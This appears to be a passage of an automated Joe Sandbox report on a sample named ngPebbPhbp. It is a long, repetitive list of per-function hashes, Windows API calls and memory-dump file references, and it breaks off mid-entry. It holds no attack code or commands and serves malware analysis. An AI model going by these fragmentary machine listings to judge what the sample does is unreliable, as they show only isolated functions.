                                                • Opcode ID: 53c4b3eabb54c8f560da11e277524ec942524956757316285086ad69176290c8
                                                • Instruction ID: a5aea7ded96993b9c88eccdca3519b906e74db0ccf856b379129cb4d83401e66
                                                • Opcode Fuzzy Hash: 53c4b3eabb54c8f560da11e277524ec942524956757316285086ad69176290c8
                                                • Instruction Fuzzy Hash: 0A21FD31289281ABC715DE64C881AABBFE8EF95304F084D9CF4E183181D728ED0CC762
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B1FB52
                                                • SHFileOperationW.SHELL32(?,?,?,?,?,?,00000000,00B5535C), ref: 00B1FC24
                                                  • Part of subcall function 00B014A7: _wcslen.LIBCMT ref: 00B014B8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: FileH_prolog3_Operation_wcslen
                                                • String ID:
                                                • API String ID: 3104323202-0
                                                • Opcode ID: 47d71d9360ccc0cdc2ba2ba0a06ee5899aa95f57e33e45ad5117cd5515a552f1
                                                • Instruction ID: da01ff542b35df42623c62d8456013c1df2ee6ba09421c21167238f190364255
                                                • Opcode Fuzzy Hash: 47d71d9360ccc0cdc2ba2ba0a06ee5899aa95f57e33e45ad5117cd5515a552f1
                                                • Instruction Fuzzy Hash: 96311671D01258DEDB15EFE9C895AEDBBF4BF08311F9401AAE419A72A1DB701A85CF10
                                                APIs
                                                • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00B0E897
                                                • GetLastError.KERNEL32 ref: 00B0E8A4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastPointer
                                                • String ID:
                                                • API String ID: 2976181284-0
                                                • Opcode ID: 88be492cbe51547279ed35793e5ea4d49ff410b11c08b5fa32e60af984de926c
                                                • Instruction ID: cefe1a3473736578dd5ecc7f6bdf3b1dc114cf9049d269f5179ee5f3ec034d1c
                                                • Opcode Fuzzy Hash: 88be492cbe51547279ed35793e5ea4d49ff410b11c08b5fa32e60af984de926c
                                                • Instruction Fuzzy Hash: 3711E531600700ABE7389664C8807AA7BE9EB45360F608BA9E072936D0D7B0ED05C760
                                                APIs
                                                • __EH_prolog3_catch_GS.LIBCMT ref: 00B23C82
                                                • _wcslen.LIBCMT ref: 00B23C99
                                                  • Part of subcall function 00B16A89: _wcslen.LIBCMT ref: 00B16AA6
                                                  • Part of subcall function 00B0B03D: __EH_prolog3_GS.LIBCMT ref: 00B0B044
                                                  • Part of subcall function 00B0B3E1: __EH_prolog3_GS.LIBCMT ref: 00B0B3E8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3__wcslen$H_prolog3_catch_
                                                • String ID:
                                                • API String ID: 1265872803-0
                                                • Opcode ID: 6561c0e6e184465ced0f9d081bbf60abaa9e9184db148bb93dd1acf782cf0122
                                                • Instruction ID: 290293792bf164fe6a7970f895cb0c6c7a1403f881b207d2d9e5802847a55478
                                                • Opcode Fuzzy Hash: 6561c0e6e184465ced0f9d081bbf60abaa9e9184db148bb93dd1acf782cf0122
                                                • Instruction Fuzzy Hash: 9311A935911B909EC724EB689C31BDC7FF8AB15313F1441DAE44497393CFB05A448BA1
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B01CE9
                                                • GetDlgItem.USER32(?,?), ref: 00B01D01
                                                  • Part of subcall function 00B014A7: _wcslen.LIBCMT ref: 00B014B8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3_Item_wcslen
                                                • String ID:
                                                • API String ID: 896027972-0
                                                • Opcode ID: 1acbdf287b68ed361b56aabe9248cc32be82e588e1037fe41860e592e3e61060
                                                • Instruction ID: 321940b31eae9af75d06b610d7b2a3b448d5ef1f4f158f8592256f5f2a0e4b92
                                                • Opcode Fuzzy Hash: 1acbdf287b68ed361b56aabe9248cc32be82e588e1037fe41860e592e3e61060
                                                • Instruction Fuzzy Hash: EC01D4716416149FD728EFACC886BEDBFE8EF54300F500A9AF816A71E1CB709A01CB10
                                                APIs
                                                • GetCurrentProcess.KERNEL32(02000000,?,00000002,00000002,?,00B176EA,00B10B6F), ref: 00B176B4
                                                • GetProcessAffinityMask.KERNEL32(00000000,?,00B176EA), ref: 00B176BB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Process$AffinityCurrentMask
                                                • String ID:
                                                • API String ID: 1231390398-0
                                                • Opcode ID: 385ff71478e6f509ddd48e6efbd6dade55f08c1c24305449bc6fe90448fb82cc
                                                • Instruction ID: 51ed25f774bd1a7566a999466a1c9970b7d77ec250d477679292dda82a26ac29
                                                • Opcode Fuzzy Hash: 385ff71478e6f509ddd48e6efbd6dade55f08c1c24305449bc6fe90448fb82cc
                                                • Instruction Fuzzy Hash: 8AE09A32B94906A78F198BA9DC099EF76EEEA4424832440BAA453E3200ED74DE4157A0
                                                APIs
                                                • GdiplusShutdown.GDIPLUS(?,?,?,?,00B39B73,000000FF), ref: 00B1F578
                                                • CoUninitialize.COMBASE(?,?,?,?,00B39B73,000000FF), ref: 00B1F57D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: GdiplusShutdownUninitialize
                                                • String ID:
                                                • API String ID: 3856339756-0
                                                • Opcode ID: 108de5d7dcae825302a1817eb44b083b0a8f628c82c9c48d957645cfeacd19bd
                                                • Instruction ID: 3b908e94d307b69f131e6193d56c2f911568e7181627e200ca997cc1d6627db7
                                                • Opcode Fuzzy Hash: 108de5d7dcae825302a1817eb44b083b0a8f628c82c9c48d957645cfeacd19bd
                                                • Instruction Fuzzy Hash: 8AF05E76604A14AFC711DF59EC41B5ABBE8FB49760F1042A6E416D3760DF74A800CA94
                                                APIs
                                                • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B1E86A
                                                • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00B1E871
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: BitmapCreateFromGdipStream
                                                • String ID:
                                                • API String ID: 1918208029-0
                                                • Opcode ID: 2ba98eb48ca51c45e2b2458834513679b6c720e0a6d2db4e40842fee54d72f25
                                                • Instruction ID: 667a0b8615e47a84462abd5a2b1cd5715a923ed7ddcb4cc66d7349d368e69ea7
                                                • Opcode Fuzzy Hash: 2ba98eb48ca51c45e2b2458834513679b6c720e0a6d2db4e40842fee54d72f25
                                                • Instruction Fuzzy Hash: 4BE012B1901218EFCB20DF95D9057DDB7F8EB04764F60849AA899A3701D670EE44EB91
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ItemShowWindow
                                                • String ID:
                                                • API String ID: 3351165006-0
                                                • Opcode ID: 9d22c023ca9d65ec6f6249e6084dd9e088a7b894ba34b135182a3c0d24d2a5c3
                                                • Instruction ID: c2caaeef215c113bae88ef8d94c9a9ab3d0fb762f153f69a3ec1c940d55cd314
                                                • Opcode Fuzzy Hash: 9d22c023ca9d65ec6f6249e6084dd9e088a7b894ba34b135182a3c0d24d2a5c3
                                                • Instruction Fuzzy Hash: FEC0123219C600BECB010B70EC09E2A7BA89B94212F00C944B1A5D1060CE39C010DB11
                                                APIs
                                                • GetDlgItem.USER32(?,?), ref: 00B01CD2
                                                • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00B01CD9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherItemUser
                                                • String ID:
                                                • API String ID: 4250310104-0
                                                • Opcode ID: 737215b2401471769b2704f5194e663c694d5bd602e79ad538b1d26d47308198
                                                • Instruction ID: 628dff67f43d7facc942fa14895ad6b5831222f3eeacb5b0f0a2dc93f93df304
                                                • Opcode Fuzzy Hash: 737215b2401471769b2704f5194e663c694d5bd602e79ad538b1d26d47308198
                                                • Instruction Fuzzy Hash: 73C04C7654C740BFCB015BA0AD1CD2FBFA9AB95312F00C989B6A591120CE358410DB11
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3
                                                • String ID:
                                                • API String ID: 431132790-0
                                                • Opcode ID: 43e4401aa52928ed6459ae562cf5fe58425b2709f52d4b10b297fd8f5b874ee6
                                                • Instruction ID: 08341f3b1d37d6cc2dbf263e11cc36e0f3317e1adbd1d1fe0100b361d48f019d
                                                • Opcode Fuzzy Hash: 43e4401aa52928ed6459ae562cf5fe58425b2709f52d4b10b297fd8f5b874ee6
                                                • Instruction Fuzzy Hash: 5AC14A70A042559BDF259F68C8987AD7FE4AF4A300F1840F9EC09DF2D6CB749949CBA1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3
                                                • String ID:
                                                • API String ID: 431132790-0
                                                • Opcode ID: 24d314bd2c7992a5b66cd7eba88106434dc12e2c8b7bab693843c3dad5cc804c
                                                • Instruction ID: 34811765c77ab1b378a764c03ad824f26d3269235976714849176e9ed2a07d28
                                                • Opcode Fuzzy Hash: 24d314bd2c7992a5b66cd7eba88106434dc12e2c8b7bab693843c3dad5cc804c
                                                • Instruction Fuzzy Hash: B18179719043948FDB24EF24D8A5BEBB7E5FF51300F9009EEE45997180EBB0AD848795
                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 00B020B7
                                                  • Part of subcall function 00B080EC: __EH_prolog3.LIBCMT ref: 00B080F3
                                                  • Part of subcall function 00B12815: __EH_prolog3.LIBCMT ref: 00B1281C
                                                  • Part of subcall function 00B076E7: __EH_prolog3.LIBCMT ref: 00B076EE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3
                                                • String ID:
                                                • API String ID: 431132790-0
                                                • Opcode ID: 9bff6f6f099c8e7bb1d728ac85fe4edca8d8adeeb54f81716b726eb91d532fba
                                                • Instruction ID: a21d541be9d654c2ae2c61502a5c7bffec2bf6fa46f75830c847db6a4adbc53d
                                                • Opcode Fuzzy Hash: 9bff6f6f099c8e7bb1d728ac85fe4edca8d8adeeb54f81716b726eb91d532fba
                                                • Instruction Fuzzy Hash: 9C51E2B1A057808EDB44DF6A84807C9BBE0AF59300F0882FADC4DDE6ABDB740254CB61
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B0B3E8
                                                  • Part of subcall function 00B0F711: FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,00B0A684,?,?,00000000,?,?,?,?,?,?), ref: 00B0F739
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: CloseFindH_prolog3_
                                                • String ID:
                                                • API String ID: 2672038326-0
                                                • Opcode ID: 63f4523f17f94c29fc3a32b897cf1ef0dd8346d1c9f50d00e52345dcdba84e8f
                                                • Instruction ID: c5c5a2589597d216fb8b600178cc8c52a51018feac3b1a5643f04a3b1c6b61b2
                                                • Opcode Fuzzy Hash: 63f4523f17f94c29fc3a32b897cf1ef0dd8346d1c9f50d00e52345dcdba84e8f
                                                • Instruction Fuzzy Hash: 43413570900609CFDB34DFA9C896AAEBBF1FF05304F5444ADE15A9B392D730A946CB25
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B02C37
                                                  • Part of subcall function 00B1880E: __EH_prolog3.LIBCMT ref: 00B18815
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3H_prolog3_
                                                • String ID:
                                                • API String ID: 3355343447-0
                                                • Opcode ID: 7bca0c622a4fbe434499ccd571ddabcc70ecfa8f48094b25ad5fe3596d5a6cad
                                                • Instruction ID: a36e7122bb2413af14176f6a8521eeb4884c0b7128dc0efb80b3a04bfc41d77c
                                                • Opcode Fuzzy Hash: 7bca0c622a4fbe434499ccd571ddabcc70ecfa8f48094b25ad5fe3596d5a6cad
                                                • Instruction Fuzzy Hash: 8231FD7190120CAEDF19DBE4D8959EEBFF9EF18300F5405AAF405A7291DB709D89CB60
                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 00B076EE
                                                  • Part of subcall function 00B14F2B: __EH_prolog3.LIBCMT ref: 00B14F32
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3
                                                • String ID:
                                                • API String ID: 431132790-0
                                                • Opcode ID: 6e1ac2af5e9428289593b58ad3028c3d5e8364e7e27f61bc5cd2a7b049cb1518
                                                • Instruction ID: 18e83b1ad202eb8f5cfcf5ec0198866648e25b37eb4a4ad8f93d85fcd0dce1f7
                                                • Opcode Fuzzy Hash: 6e1ac2af5e9428289593b58ad3028c3d5e8364e7e27f61bc5cd2a7b049cb1518
                                                • Instruction Fuzzy Hash: BD4163B4816B85CAC724DF7AD1493CAFBE8AFA5300F10995FD0AE93361D7B025448F19
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3
                                                • String ID:
                                                • API String ID: 431132790-0
                                                • Opcode ID: cab9f97e63b20e8bf7bac265719ffb65e065b2fbeb052894983c2c13f756af5a
                                                • Instruction ID: 1064b44fe17249e373b03508444321a33ac26a4fd925f57b27287a153ed9adb4
                                                • Opcode Fuzzy Hash: cab9f97e63b20e8bf7bac265719ffb65e065b2fbeb052894983c2c13f756af5a
                                                • Instruction Fuzzy Hash: 4A2106B19012229BEF289F749C5AA9E76E4FF04354F1501BAE509EB2C1DB709D80C7E4
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3
                                                • String ID:
                                                • API String ID: 431132790-0
                                                • Opcode ID: 25a143d13808a51f29d66fceb04ed8167be6792816b48139d21d0613e4e4d01c
                                                • Instruction ID: 1ba09265321e4514b9bcf9cfc0119a7df406b3ab92441276391677dfdc25f2d7
                                                • Opcode Fuzzy Hash: 25a143d13808a51f29d66fceb04ed8167be6792816b48139d21d0613e4e4d01c
                                                • Instruction Fuzzy Hash: 79218372A0161A9BCB14DFE9DC81AEEBBF9FF88300F14445AF504B7281DB749E008B95
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3_
                                                • String ID:
                                                • API String ID: 2427045233-0
                                                • Opcode ID: 90d56617d36f790ed75c69ce670b99c52f569be0f1ec4eded0297e44da0ec48e
                                                • Instruction ID: b6c05b23e18250244f7fe3f297466c39b8ce8506f5b251e5e636881cb915fa3a
                                                • Opcode Fuzzy Hash: 90d56617d36f790ed75c69ce670b99c52f569be0f1ec4eded0297e44da0ec48e
                                                • Instruction Fuzzy Hash: 0721AE30641208AADF209E68C882EEE7BE9EF12750F545DC8F4A2A71D1CB70DE49C760
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3_
                                                • String ID:
                                                • API String ID: 2427045233-0
                                                • Opcode ID: d3829a019965efe2c2213293668e43e0480c35bf9bf1799d4ded068ecb45c712
                                                • Instruction ID: 14b879ecfa037427a4417f31af30ab643b013eeecde53c237f1c6438f7f04945
